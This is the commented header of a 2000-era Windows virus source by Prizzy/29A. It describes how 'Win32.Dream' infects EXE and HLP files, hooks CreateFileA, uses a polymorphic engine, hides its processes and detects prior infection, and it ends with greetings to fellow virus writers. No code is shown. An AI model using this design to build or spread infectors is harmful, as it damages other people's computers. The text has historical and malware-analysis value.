;
;  ﾚﾄﾄﾍﾍﾍﾍﾍﾍﾍﾍﾄﾄﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿﾄﾄﾍﾍﾍﾍﾍﾍﾍﾍﾄﾄｿ
;  : Prizzy/29A :		  Win32.Dream		      : Prizzy/29A :
;  ﾀﾄﾄﾍﾍﾍﾍﾍﾍﾍﾍﾄﾄﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙﾄﾄﾍﾍﾍﾍﾍﾍﾍﾍﾄﾄﾙ
;
;   Hello people, here is my third virus especially when it is designed for
;   whole Win32  platform. It  infects	only EXE (PE - Portable Executable)
;   files and also HLP (Windows Help File Format).
;
;   When infected EXE file is started, EIP goes through my easy polymorphic
;   engine, which isn't so important in this virus, then  hooks CreateFileA
;   function, installs itself  into memory and only  then it can put EIP to
;   the host - there're two returns, one for EXE the other for HLP files.
;
;   With might and mind I wanted to use only it the best from new high-tech
;   vx methods we know. And I think is nothing worst than virus equipped of
;   interprocess communication (IPC). I also changed my coding style and
;   this source is most optimization as I could.
;
;
;			     Detailed Information
;			    ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;
;
;   1. Interprocess Communication (IPC)
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   You could see one IPC virus (Vulcano) by Benny/29A but I used this fea-
;   ture other way than he. His IPC virus is only in one process and it can
;   communicate with others viruses in another process.
;
;   The parts of my Win32.Dream virus work in several processes and in fact
;   it behades like one whole virus. After installing to memory, virus will
;   remove itself from memory of the infected program.
;
;
;   1.1. Creating processes
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   This virus is divided into seven 'independent' functions which have own
;   process. To create new process I would build a dropper and via the Cre-
;   ateProcessA I would run them.
;
;   The dropper wait than new function for its process is ready, if yes, it
;   shares two mapped blocks (OpenFileMappingA) for that process (it's Glo-
;   bal memory and Function's body) and creates thread on the function. The
;   process can't terminate it	can only Sleep.  All created  processed are
;   hiden in Windows 95, not in WinNT/2k (is't more complex).
;
;
;   1.2. IPC in action
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   Hooked CreateFileA functions  retrieves control, sets  flag for certain
;   process and awakes its. That process  finishes own task and returns re-
;   sults.
;
;
;   1.3. Global memory
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   It's necessary to share some important information among all processes.
;   There are:
;
;      + [thandle]    : When the dropper will create new thread here is re-
;			turned handle. It indicates the thread's errorcode.
;      + [th_mempos]  : Here is stored the name of the Function's mapped
;			object. The dropper will open that memory area.
;      + [process]    : hProcess, ProcessID values of the all created pro-
;			cesses because of opening/runing them.
;      + [apiz]       : The addresses of the all APIz I call are on this
;			place.
;      + [active]     : If other process wants to run me, sets certain flag
;			here and the thread tests it.
;      + [paramz]     : This is place where the virus store some parameters
;			among processes (see below).
;      + [vbody]      : Here is the copy of the virus, useful for changing
;			values inside and for poly engine.
;      + [filename]   : The future infected filename. New CreateFileA func-
;			tion stores the name here.
;      + [cinfected]  : Two FPU memory buffers, one for creating of the in-
;			fection mark the other for checking.
;      + [poly_vbody] : Output from polymorphic engine.
;
;
;   1.4. Parameters
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   As I wrote above I have to get some parameters of the input processes.
;   Here is the description of them:
;
;      + [1st param] : Out of polymorhpic engine, the new size of the virus
;      + [2nd param] : Filesize for checksum (+poly size yet).
;      + [3rd param] : The name of the mapped file (for OpenFileMappingA).
;      + [4th param] : a. Filesize for check_infected (without poly size).
;		       b. Out of checksum.
;      + [5th param] : Input for check_infected, if '1', then it wants to
;		       get an angle for create_infected.
;      + [6th param] : Terminate all processes ? (WinNT/2000 only)
;      + [7th param] : Terminate all processes ? (Win95/98   only)
;		       (because of Win95/98 kernel bug)
;
;
;   1.5. Termination of the all processes
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   I remember it was a nut for me but of course I'd to solve it.  At first
;   I changed flags of the process (SetErrorMode, it means, the process 'll
;   not show any message box if it will do bad instructions), then I had to
;   check if the host lives yet. In Win95/98 I have discovered a kernel bug
;   so that I couldn't use WinNT version (OpenProcess) to check if the host
;   still exists because Win95/98 don't delete its process id handle.
;   Win95 - you can only read some value the from allocated memory by host.
;   WinNT - that allocated memory is opened by other process, you can't
;	    identify if the host still exists.
;
;
;   1.6. The scheme of the all processes
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;
;
;    ﾉﾍﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾍｻ
;    ｳ			 new CreateFileA API function			ｳ
;    ﾈﾍﾄﾄﾄﾄﾑﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾍｼ
;	   ｳ
;	ﾉﾍﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾍｻ
;	ｳ  infect file	ｳ	ﾉﾍﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾍｻ
;	ﾈﾍﾄﾑﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾍｼ   ﾚﾄﾄﾄ   infect HLP	 ｳ
;	   ﾃﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ	ﾈﾍﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾍｼ
;	   ｳ
;	   ｳ   ﾉﾍﾄﾄﾄﾄﾄﾄﾄﾄﾍｻ
;	   ｳ   ｺ	  ｺ	   ﾚﾄﾄ [check_infected]
;	   ｳ   ｳ	  ﾃﾄﾄﾄﾄﾄﾄﾄﾙ
;	   ｳ   ｳ  infect  ﾃﾄﾄﾄﾄﾅﾄﾄﾄﾄﾄﾄ [poly_engine]
;	   ﾀﾄﾄﾄ	  ｳ    ｳ
;	       ｳ   EXE	  ﾃﾄﾄﾄﾄﾅﾄﾄﾄﾄﾄﾄ [create_infected]
;	       ｳ	  ﾃﾄﾄﾄﾄﾄﾄﾄｿ
;	       ｺ	  ｺ	   ﾀﾄﾄ [checksum]
;	       ﾈﾍﾄﾄﾄﾄﾄﾄﾄﾄﾄｼ
;
;
;   2. Optimalization and comments
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   Sometimes I heard my last virus Win32.Crypto is too huge and  also some
;   people had a fun from  me (benny, mort - gotcha bastards!) that my next
;   virus will be bigger than one megabyte. I wanted to  optimize  next one
;   and I've not told them it so I think it'll be  surprise for them I pro-
;   ved. Nevertheless I've a taste of the second side and  now I can return
;   myself without any major problems. But now	I can say the virus is more
;   optimization than benny's bits and pieces. The source  code is not com-
;   mented enough because I think no many  people will taste something like
;   IPC is. If yes, they can contact me.
;
;
;   3. Check infected routine
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   Long ago in Win32.Crypto I tasted to use  unique math technique  how to
;   check if the file is infected. Now I  thought up new more  complex way.
;   At first from infected file I'll compile the equation, for example:
;		    y = 32*x^7 + 192*x^3 - 8212*x^5 - 72*x
;   and I'll get two points on that curve, for example x1=4 and x2=7.  Then
;   I will calculate  what angle is between the  tangents to the curve from
;   that two points, it  means: I have to  calculate derivation y' of  that
;   equation and if I know y=x1 and y=x2 then I will determine:
;		 & = arc tg | log(x1 - x2) - log(1 + x1*x2) |
;   If the angle will be greater e.g. than 75 degree, file is infected.
;
;   This algorithm has been coded only for fun so that I know we've  easier
;   methods but I couldn't call to remembrance on any.
;
;
;   4. Pearls behind the scene
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;   * Only two weeks before release I've think the virus name up at last.
;   * At a time, during coding, I stopped writing and this virus  I haven't
;     coded for two months. Later when I started again I  couldn't remember
;     what that code does and so on.
;   * In present exists over than fifty backup copies.
;   * The worst part of the virus was the dropper, there were  many changes
;     because of Win9x and WinNT compatibility; many bugs were there.
;   * After a hour of the coding I unwillingly deleted new version. So that
;     I'd to save more than one gigabytes from FAT32 on another  hard disk.
;     Only there I found that lost version.
;   * The best thing I like on the whole virus is main comment.
;   * Working directory was 'E:\X_WIN\' and this file name was 'WIN.AS!'.
;   * Last week I was looking for help on mirc
;	<prizzy> i used also OpenFileMapping, but I think yes; if ...
;	<Bumblebee> mmm
;	<Bumblebee> OpenFileMapping?
;	<prizzy> yes :)
;	<Bumblebee> i've never used it		   [bumble~1.log, 18:59:17]
;     ...but much help I haven't found there (although Bumblebee helped
;     me with another bug).
;   * During whole coding I've read five books and three film scripts.
;
;
;   5. List of greetings
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;     Darkman	       The master of the good optimistic mood
;     Bumblebee        Thanks for your help during coding
;     Billy Belcebu    So, our communication has started yet
;     GriYo	       All the time busy man
;     Lord Julus       Waiting for your new virus and its meta engine
;     Mort	       So did you think this source will be bigger then
;		       one megabytes? Sorry, maybe later :).
;     J.P.	       I look forward on future with you, dude.
;     Ratter	       No, no. Stop reading and let you show us what you
;		       are hiding inside.
;     VirusBuster      Here is that secret bin with savage poly engine as
;		       you wrote on #virus.
;     Benny	       It the best in the end, benny. Haha, at last this
;		       source is optimized and you will stop to worry me.
;		       Thanks for all you have e'er done for me.
;     ...and for flush, asmodeus, mlapse, mgl, f0re and evul.
;
;
;   6. Contact me
;   ﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄ
;     prizzy@coderz.net
;     http://**********
;
;
;   (c)oded by Prizzy/29A, June 2000
;
;